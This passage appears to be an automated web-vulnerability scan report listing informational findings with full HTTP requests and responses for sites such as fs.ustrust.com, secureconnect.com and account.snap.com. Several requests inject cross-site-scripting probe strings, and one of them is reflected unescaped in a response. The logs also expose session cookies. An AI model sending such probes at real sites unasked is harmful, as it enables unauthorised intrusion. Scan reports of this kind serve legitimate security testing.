User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fs.ustrust.com
Cookie: Bear=TVWFHBJKf7TC1zhoN6cKOOPAr8xtme3QHkMKm7C73mI=
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS
Date: Tue, 26 Apr 2011 12:29:43 GMT
Content-type: text/html

<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD>
<BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site
...[SNIP]...

30.22. https://www.fs.ustrust.com/login/login.aspx/%22ns=%22netsparker(0x000011)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx/%22ns=%22netsparker(0x000011)

Request

GET /login/login.aspx/%22ns=%22netsparker(0x000011) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fs.ustrust.com
Cookie: Bear=TVWFHBJKf7TC1zhoN6cKOOPAr8xtme3QHkMKm7C73mI=
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS
Date: Tue, 26 Apr 2011 12:29:48 GMT
Content-type: text/html

<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD>
<BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site
...[SNIP]...

30.23. https://www.fs.ustrust.com/login/login.aspx/%2522ns%253D%2522netsparker%25280x000012%2529)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /login/login.aspx/%2522ns%253D%2522netsparker%25280x000012%2529)

Request

GET /login/login.aspx/%2522ns%253D%2522netsparker%25280x000012%2529) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fs.ustrust.com
Cookie: Bear=TVWFHBJKf7TC1zhoN6cKOOPAr8xtme3QHkMKm7C73mI=
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS
Date: Tue, 26 Apr 2011 12:29:49 GMT
Content-type: text/html

<HEAD><TITLE>403: Access Forbidden</TITLE></HEAD>
<BODY><FONT COLOR="#CC0000"><b>Due to the presence of characters known to be used in Cross Site Scripting attacks, access is forbidden. This web site
...[SNIP]...

30.24. http://www.onestoppciscan.com/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onestoppciscan.com
Path:   /contact.html

Request

GET /contact.html HTTP/1.1
Host: www.onestoppciscan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:53:30 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 13:42:49 GMT
ETag: "df8475-413a-49efe4dae6840"
Accept-Ranges: bytes
Content-Length: 16698
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
   <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.backbonesecurity.com/interior.cfm?itemCategory=39808&siteid=418&pr
...[SNIP]...

30.25. http://www.saintcorporation.com/cgi-bin/shopcart/cart.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saintcorporation.com
Path:   /cgi-bin/shopcart/cart.pl

Request

GET /cgi-bin/shopcart/cart.pl HTTP/1.1
Host: www.saintcorporation.com
Proxy-Connection: keep-alive
Referer: http://www.saintcorporation.com/products/order.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.1.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:57:37 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 13403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>shop c
...[SNIP]...

30.26. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /cgi-bin/secure/customer/logon.pl

Request

GET /cgi-bin/secure/customer/logon.pl HTTP/1.1
Host: www.saintcorporation.com
Connection: keep-alive
Referer: http://www.saintcorporation.com/products/order.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.2.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:52 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 2427

<html>
<head>
<link rel="stylesheet" href="../../../ext/imain.css" type="text/css">
<link rel="stylesheet" href="../../../ext/forms.css" type="text/css">
<link rel="stylesheet" href="../../../ext/widg
...[SNIP]...

30.27. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /cgi-bin/shopcart/cartaction.pl

Request

POST /cgi-bin/shopcart/cartaction.pl HTTP/1.1
Host: www.saintcorporation.com
Connection: keep-alive
Referer: http://www.saintcorporation.com/cgi-bin/shopcart/cart.pl
Cache-Control: max-age=0
Origin: http://www.saintcorporation.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.3.10.1303775066
Content-Length: 15

parts_cb=wsp50s

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:03:56 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 6496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>shop c
...[SNIP]...

30.28. http://www.secureconnect.com/rssReplayProxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.secureconnect.com
Path:   /rssReplayProxy.php

Request

GET /rssReplayProxy.php?cache=true&source=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000113)%3C/script%3E HTTP/1.1
Host: www.secureconnect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32024892.1303775103.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=32024892.207743889.1303775103.1303775103.1303775103.1; __utmb=32024892.2.10.1303775103

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:08:20 GMT
Server: Apache/2.2.14 (FreeBSD) mod_ssl/2.2.14 OpenSSL/0.9.8k PHP/5.3.3 with Suhosin-Patch
X-Powered-By: PHP/5.3.3
Content-Length: 123
Content-Type: text/html

RSS Replay Proxy Error: No matching source for the specified ID '"--></style></script><script>netsparker(0x000113)</script>

31. HTML uses unrecognised charset  previous  next
There are 3 instances of this issue:


31.1. https://secure.opinionlab.com/ccc01/comment_card.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:41:01 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

31.2. https://secure.opinionlab.com/ccc01/comment_card_d.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_d.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/comment_card_d.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6067
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=MFMHJNCDOEKIPAJALGIFIFEG; path=/
Date: Tue, 26 Apr 2011 12:45:42 GMT
Connection: close

<!--TEMPLATE version 3.6.1 UNIVERSAL CSS: 0--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment Ca
...[SNIP]...

31.3. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8179
Content-Type: text/html; Charset=UTF-8
Set-Cookie: ASPSESSIONIDSSSARBAA=ICKHJNCDOCHODDPLMDGOHIIG; path=/
Date: Tue, 26 Apr 2011 12:41:00 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

32. Content type incorrectly stated  previous  next
There are 40 instances of this issue:


32.1. http://172-vim-170.mktoresp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://172-vim-170.mktoresp.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: 172-vim-170.mktoresp.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:44:12 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 03:41:11 GMT
ETag: "c2e656-47e-49d9feac543c0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ........................................................................................................................................5.......}..................
...[SNIP]...

32.2. https://account.snap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://account.snap.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:49 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Last-Modified: Sat, 03 Nov 2007 05:08:13 GMT
ETag: "31325ec-47e-43dff45274940"
Accept-Ranges: bytes
Content-Length: 1150
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........................6E>.CQJ.........................CQJ.6E>.6E>.6E>.6E>.6E>.6E>.6E>.6E>.htn.............................6E>.6E>.6E>.6E>.6E>.6E>.6E>.6E>.htn...
...[SNIP]...

32.3. https://account.snap.com/javascript/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://account.snap.com
Path:   /javascript/jquery.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/jquery.js HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:04:04 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46412

/*
* jQuery 1.2.1 - New Wave Javascript
*
* Copyright (c) 2007 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 2007/10/3
...[SNIP]...

32.4. https://account.snap.com/javascript/prototype.1.6.1.0.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://account.snap.com
Path:   /javascript/prototype.1.6.1.0.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/prototype.1.6.1.0.js HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:42 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 139854

/* Prototype JavaScript framework, version 1.6.1
* (c) 2005-2009 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype
...[SNIP]...

32.5. https://account.snap.com/javascript/tab.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://account.snap.com
Path:   /javascript/tab.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/tab.js HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: https://account.snap.com/signup.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435; PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:32 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Vary: User-Agent
Content-Length: 1220
Connection: close
Content-Type: text/html; charset=UTF-8


function tab(num) {
var f = document.getElementById("login_form");
f.tab.value = num;
f.submit();
return false;
}

function submitTabForm(formName){
   createHiddenInput(formName, "cur
...[SNIP]...

32.6. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1303827696143 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=24&initExp=Sun Apr 24 12:09:48 2011&recExp=Tue Apr 26 14:21:11 2011&prad=253732015&arc=178113848&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303827675%2E212%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 14:21:27 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

32.7. http://bridgefront.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bridgefront.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: bridgefront.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1; __utmc=199010044; __utmb=199010044.2.10.1303780600

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:24:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Jan 2008 17:11:38 GMT
ETag: "2c98537-57e-4d808680"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@...................................JJJ.........eee.............WWW.ttt.........^^^.................nnn.....RRR.yyy.............iii.}}}.............MMM.......
...[SNIP]...

32.8. http://cleanallspyware.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cleanallspyware.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: cleanallspyware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:33 GMT
Server: Apache
Last-Modified: Fri, 11 Sep 2009 15:08:43 GMT
ETag: "20e01d2-57e-b11db4c0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... .......................................................@.........U.+@........[.C.v.........=...1...D.......)_..<...,...@.k.....1e..4.........<.X.....o.....>...........G.
...[SNIP]...

32.9. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-5253809430940410%26output%3Dhtml%26h%3D600%26slotname%3D1644788465%26w%3D120%26lmt%3D1303845665%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.spamlaws.com%252Fspam-blocker.html%26dt%3D1303827665898%26bpp%3D8%26shv%3Dr20110420%26jsv%3Dr20110415%26prev_slotnames%3D8319948044%252C1020003104%252C9565114904%252C0023118579%26correlator%3D1303827663964%26frm%3D0%26adk%3D222637912%26ga_vid%3D902403751.1303827664%26ga_sid%3D1303827664%26ga_hid%3D1845423620%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D965%26bih%3D956%26fu%3D0%26ifi%3D5%26dtd%3D13%26xpc%3DgvNjmv27ZD%26p%3Dhttp%253A%2F%2Fwww.spamlaws.com&uid=ZC45X9Axu6NOUFfX_289667&xy=0%2C0&wh=120%2C600&vchannel=69114&cid=166308&iad=1303827681130-85943930735811580&cookieenabled=1&screenwh=1920%2C1200&adwh=120%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5253809430940410&output=html&h=600&slotname=1644788465&w=120&lmt=1303845665&flash=10.2.154&url=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&dt=1303827665898&bpp=8&shv=r20110420&jsv=r20110415&prev_slotnames=8319948044%2C1020003104%2C9565114904%2C0023118579&correlator=1303827663964&frm=0&adk=222637912&ga_vid=902403751.1303827664&ga_sid=1303827664&ga_hid=1845423620&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=965&bih=956&fu=0&ifi=5&dtd=13&xpc=gvNjmv27ZD&p=http%3A//www.spamlaws.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C248A7682479DBB6FED950BA84EACF87; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Tue, 26 Apr 2011 14:21:13 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289667");

32.10. http://i.ixnp.com/shot_main_js/v6.59/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i.ixnp.com
Path:   /shot_main_js/v6.59/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

